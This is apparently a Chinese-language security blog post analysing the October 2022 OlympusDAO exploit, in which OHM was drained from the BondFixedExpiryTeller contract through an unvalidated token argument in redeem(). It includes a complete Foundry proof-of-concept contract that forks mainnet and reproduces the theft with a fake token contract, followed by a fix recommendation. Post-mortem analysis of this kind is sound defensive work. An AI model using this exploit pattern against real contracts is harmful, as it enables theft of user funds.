05.OlympusDao@validation
2023-09-18 11:08:32 # 08.PoC

OlympusDao@validation

事件背景

BondFixedExpiryTeller合约拥有的OHM代币被偷走

  • 时间:2022.10.21
  • 损失金额:$292k

交易

资金流向

image-20230829160738892

攻击过程

image-20230829162313109

攻击合约获利之后,转回到EOA地址,然后去到OlympusDAO中调用transfer()

攻击详细分析

根据攻击过程可以知道,黑客利用合约,调用BondFixedExpiryTeller合约的redeem()就直接获利,因此,此方法肯定有明显的漏洞:此方法用于取款,烧掉用户在token_的资产,然后此合约转给用户token_的标的资产。但是,token_是可控的,并且没有做任何检验,这就意味着很容易就达到转账,仅仅只是实现burn()expiry()underlying()

1
2
3
4
5
6
function redeem(ERC20BondToken token_, uint256 amount_) external override nonReentrant {
    if (uint48(block.timestamp) < token_.expiry())
        revert Teller_TokenNotMatured(token_.expiry());
    token_.burn(msg.sender, amount_);
    token_.underlying().transfer(msg.sender, amount_);
}

复现

github

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
pragma solidity ^0.8.10;

import "forge-std/Test.sol";
import "./interface.sol";

contract Attacker is Test {

    IOHM public ohm = IOHM(address(0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5));
    IBondFixedExpiryTeller public BondFixedExpiryTeller = IBondFixedExpiryTeller(address(0x007FE7c498A2Cf30971ad8f2cbC36bd14Ac51156));

     function setUp() public {
        vm.createSelectFork("mainnet", 15_794_363);

        vm.label(address(ohm), "OHM");
        vm.label(address(BondFixedExpiryTeller), "BondFixedExpiryTeller");
        vm.label(address(this), "attackerContract");
    }

    function test_Exploit() public {
        console.log("[before] address(this) OHM balance",ohm.balanceOf(address(this)));

        uint256 amountToHack = ohm.balanceOf(address(BondFixedExpiryTeller));
        BondFixedExpiryTeller.redeem(address(this), amountToHack);

        console.log("[after] address(this) OHM balance",ohm.balanceOf(address(this)));

        assertEq(amountToHack, ohm.balanceOf(address(this)));
    }

    function expiry() public returns(uint256){
        return 0;
    }

    function burn(address,uint256) public returns(bool){
        return true;
    }

    function underlying() public returns(address){
        return address(ohm);
    }

}

建议

如果参数是外部可控的,一定要进行检验

Prev
2023-09-18 11:08:32 # 08.PoC
Next